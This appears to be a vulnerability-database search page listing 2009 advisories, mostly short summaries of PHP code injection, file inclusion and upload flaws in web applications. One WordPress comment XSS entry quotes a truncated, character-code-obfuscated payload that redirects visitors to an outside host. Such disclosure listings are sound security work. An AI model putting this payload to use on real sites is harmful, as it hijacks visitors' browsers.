
7205 matches found

Prion
added 2009/08/11 10:30 a.m. | 13 views

Code injection

Static code injection vulnerability in admin.php in sun-jester OpenNews 1.0 allows remote authenticated administrators to inject arbitrary PHP code into config.php via the "Overall Width" field in a setconfig action...

6.5 CVSS | 7.3 AI score | 0.01511 EPSS
Exploits: 0 | References: 5 | Affected Software: 1

NVD
added 2009/08/11 10:30 a.m. | 12 views

CVE-2009-2736

Static code injection vulnerability in admin.php in sun-jester OpenNews 1.0 allows remote authenticated administrators to inject arbitrary PHP code into config.php via the "Overall Width" field in a setconfig action...

6.5 CVSS | 6.8 AI score | 0.01511 EPSS
Exploits: 0 | References: 5

CVE
added 2009/08/11 10:0 a.m. | 41 views

CVE-2009-2736

CVE-2009-2736 concerns sun-jester OpenNews 1.0. The vulnerability is a static code injection in admin.php that allows remote authenticated administrators to inject arbitrary PHP code into config.php via the “Overall Width” field in a setconfig action. The issue originates from the admin.php compo...

6.5 CVSS | 7 AI score | 0.01511 EPSS
Exploits: 0 | References: 5 | Affected Software: 1

Cvelist
added 2009/08/11 10:0 a.m. | 20 views

CVE-2009-2736

Static code injection vulnerability in admin.php in sun-jester OpenNews 1.0 allows remote authenticated administrators to inject arbitrary PHP code into config.php via the "Overall Width" field in a setconfig action...

6.8 AI score | 0.01511 EPSS
Exploits: 0 | References: 5

exploitpack
added 2009/08/10 12:0 a.m. | 28 views

Papoo CMS 3.7.3 - (Authenticated) Arbitrary Code Execution

Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution Advisory: Papoo CMS: Authenticated Arbitrary Code Execution The Papoo CMS allows authenticated users to upload GIF, JPG and PNG images if they have the "upload images" privilege, which is true for all default groups that can access the...

0.7 AI score
Exploits: 0

securityvulns
added 2009/08/10 12:0 a.m. | 65 views

[RT-SA-2009-005] Papoo CMS: Authenticated Arbitrary Code Execution

Advisory: Papoo CMS: Authenticated Arbitrary Code Execution The Papoo CMS allows authenticated users to upload GIF, JPG and PNG images if they have the "upload images" privilege, which is true for all default groups that can access the administrative interface. The CMS checks the uploaded images...

7.9 AI score
Exploits: 0

NVD
added 2009/07/28 7:30 p.m. | 10 views

CVE-2009-2634

PHP remote file inclusion vulnerability in toolbarext.php in the MediaLibrary commedialibrary component 1.5.3 Basic for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter...

7.5 CVSS | 7.6 AI score | 0.0168 EPSS
Exploits: 0 | References: 1

Cvelist
added 2009/07/28 7:6 p.m. | 13 views

CVE-2009-2635

PHP remote file inclusion vulnerability in toolbarext.php in the RealEstateManager comrealestatemanager component 1.0 Basic for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter...

7.6 AI score | 0.01627 EPSS
Exploits: 0 | References: 1

seebug.org
added 2009/07/28 12:0 a.m. | 20 views

Allomani Mobile 2.5 Remote Blind SQL Injection Exploit

No description provided by source.

7.1 AI score
Exploits: 0

myhack58
added 2009/07/26 12:0 a.m. | 11 views

iShowMusic V1. 2 Write a shell vulnerability-vulnerability warning-the black bar safety net

A few days before the announcement of the vulnerability, these days quite busy, today only see. Just some time ago using this program to do a music station, in the own Station test is successful, by the way also fill the lower holes. -------- Vulnerability description: iShow Music is a basic set...

7 AI score
Exploits: 0

Metasploit
added 2009/07/21 3:20 p.m. | 55 views

TikiWiki jhot Remote Command Execution

TikiWiki contains a flaw that may allow a malicious user to execute arbitrary PHP code. The issue is triggered due to the jhot.php script not correctly verifying uploaded files. It is possible that the flaw may allow arbitrary PHP code execution by uploading a malicious PHP script resulting in a...

7.5 CVSS | 7.6 AI score | 0.83363 EPSS
Exploits: 8

myhack58
added 2009/07/16 12:0 a.m. | 18 views

wordpress281 comments show xss vulnerability-vulnerability warning-the black bar safety net

Ghost boy’blog, XEYE’s blogto assist in testing. POC: the 1. In the comment URL field, fill in the 2. 3. http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location. href=String. fromCharCode104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,11...

7.2 AI score
Exploits: 0

OpenVAS
added 2009/07/15 12:0 a.m. | 16 views

DM FileManager <= 3.9.4 RFI Vulnerability - Active Check

DM FileManager is prone to a remote file inclusion (RFI) vulnerability. SPDX-FileCopyrightText: 2009 Greenbone AG. Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

6.8 CVSS | 6.7 AI score | 0.01464 EPSS
Exploits: 0 | References: 3

NVD
added 2009/07/09 4:30 p.m. | 10 views

CVE-2009-2396

PHP remote file inclusion vulnerability in template/album.php in DM Albums 1.9.2, as used standalone or as a WordPress plugin, allows remote attackers to execute arbitrary PHP code via a URL in the SECURITYFILE parameter...

9.3 CVSS | 7.5 AI score | 0.03668 EPSS
Exploits: 1 | References: 3

NVD
added 2009/07/09 4:30 p.m. | 9 views

CVE-2009-2399

PHP remote file inclusion vulnerability in dm-albums/template/album.php in DM FileManager 3.9.4, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the SECURITYFILE parameter...

6.8 CVSS | 7.5 AI score | 0.01464 EPSS
Exploits: 0 | References: 2

Prion
added 2009/07/08 3:30 p.m. | 13 views

Format string

Drupal 6.x before 6.13 does not prevent users from modifying user signatures after the associated comment format has been changed to an administrator-controlled input format, which allows remote authenticated users to inject arbitrary web script, HTML, and possibly PHP code via a crafted user...

6.5 CVSS | 6.9 AI score | 0.01134 EPSS
Exploits: 0 | References: 4 | Affected Software: 1

CVE
added 2009/07/08 3:0 p.m. | 46 views

CVE-2009-2371

The CVE-2009-2371 entry affects the Drupal module Advanced Forum (6.x) prior to 6.x-1.1. The issue arises when the module allows users to modify their signatures after the comment format has been switched to an administrator-controlled input format, enabling remote authenticated users to inject a...

6.5 CVSS | 6.8 AI score | 0.00642 EPSS
Exploits: 0 | References: 5 | Affected Software: 1

Prion
added 2009/07/07 7:0 p.m. | 24 views

Unrestricted file upload

Unrestricted file upload vulnerability in index.php in phpGreetCards 3.7 allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a link that is listed by userfiles/numbershell.php...

6.8 CVSS | 8 AI score | 0.06186 EPSS
Exploits: 1 | References: 6 | Affected Software: 1

Prion
added 2009/07/05 4:30 p.m. | 17 views

Code injection

Multiple static code injection vulnerabilities in CMS Chainuk 1.2 and earlier allow remote attackers to inject arbitrary PHP code (1) into settings.php via the menu parameter to adminsettings.php or (2) into a content/=NUMBER.php file via the title parameter to adminnew.php...

7.5 CVSS | 8 AI score | 0.02445 EPSS
Exploits: 0 | References: 3 | Affected Software: 1

NVD
added 2009/07/05 4:30 p.m. | 10 views

CVE-2009-2331

Multiple static code injection vulnerabilities in CMS Chainuk 1.2 and earlier allow remote attackers to inject arbitrary PHP code (1) into settings.php via the menu parameter to adminsettings.php or (2) into a content/=NUMBER.php file via the title parameter to adminnew.php...

7.5 CVSS | 7.4 AI score | 0.02445 EPSS
Exploits: 0 | References: 3